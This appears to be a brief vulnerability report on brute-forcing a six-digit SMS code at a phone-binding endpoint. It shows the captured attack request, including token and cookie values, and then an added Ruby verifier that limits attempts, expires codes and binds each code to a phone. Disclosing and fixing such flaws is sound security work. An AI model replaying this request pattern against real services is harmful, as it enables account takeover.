When binding a phone number, the SMS verification code can be brute-forced, which allows an attacker to bind any phone number.
POST /users/sms_bind HTTP/1.1
Host: www.example.com
Connection: close
Content-Length: 36
X-NewRelic-ID: xx
Origin: Example Domain
X-CSRF-Token: E0LUsrMqbnqMBHnKISFWhLe6tb9stW83ZndvrnxFyQ0=
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
X-Requested-With: XMLHttpRequest
Referer: Example Domain
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: all_ag9zfmNsaWNrZGVza2NoYXRyDwsSBXVzZXJzGIngh_ECDA-clickdesk_referrer=https%3A//www.example.com/users/sign_in; sign_up_email=xxx%40qq.com; all_ag9zfmNsaWNrZGVza2NoYXRyDwsSBXVzZXJzGIngh_ECDA-proactive_rules_session_cookie=proactive_session; _session_id=7629ede14d8ffc82f388fadd80587894; _ga=GA1.2.1537584995.1407502732
utf8=xxx=948061
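The request above submits a six-digit code that the server checks with no limit on wrong guesses, so the whole code space can be tried. The following is an added example, not the reported site's code: a Ruby verifier for a Rails-style /users/sms_bind handler that expires the code, caps failed attempts, ties the code to the phone it was issued for, and discards it after use. Class, method and parameter names are assumptions.

```ruby
require 'securerandom'

# Server-side SMS-code check with the controls whose absence makes the
# bind endpoint brute-forceable (assumed names; in-memory store for the example).
class SmsBindVerifier
  MAX_ATTEMPTS = 5     # 10^6 possible codes; 5 guesses gives a 0.0005% hit rate
  TTL_SECONDS  = 300   # code expires five minutes after issue

  Challenge = Struct.new(:phone, :code, :issued_at, :attempts)

  def initialize(clock: -> { Time.now })
    @clock = clock
    @challenges = {}   # session_id => Challenge
  end

  # Called when the user requests a code; returns what the SMS gateway would send.
  def issue(session_id, phone)
    code = format('%06d', SecureRandom.random_number(1_000_000))
    @challenges[session_id] = Challenge.new(phone, code, @clock.call, 0)
    code
  end

  # Called on POST /users/sms_bind. Returns :ok, :expired, :locked,
  # :mismatch or :no_challenge. Terminal outcomes delete the challenge,
  # so a code can be neither reused nor guessed at indefinitely.
  def verify(session_id, phone, submitted)
    ch = @challenges[session_id]
    return :no_challenge unless ch
    if @clock.call - ch.issued_at > TTL_SECONDS
      @challenges.delete(session_id)
      return :expired
    end
    ch.attempts += 1
    # The phone must match the one the code was issued for, so a code
    # requested for one number cannot be replayed to bind another.
    if ch.phone == phone && secure_equal?(ch.code, submitted.to_s)
      @challenges.delete(session_id)
      return :ok
    end
    if ch.attempts >= MAX_ATTEMPTS
      @challenges.delete(session_id)   # force a fresh code; guesses do not carry over
      return :locked
    end
    :mismatch
  end

  private

  # Constant-time comparison so response timing does not leak matching digits.
  def secure_equal?(a, b)
    return false unless a.bytesize == b.bytesize
    a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
  end
end
```

In a real deployment the challenge store would live in the session backend or a cache with the same TTL, and the lockout would also be counted per phone number and per source IP, not only per session.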
This article was migrated from the Knowledge Planet (知识星球) group "火线Zone".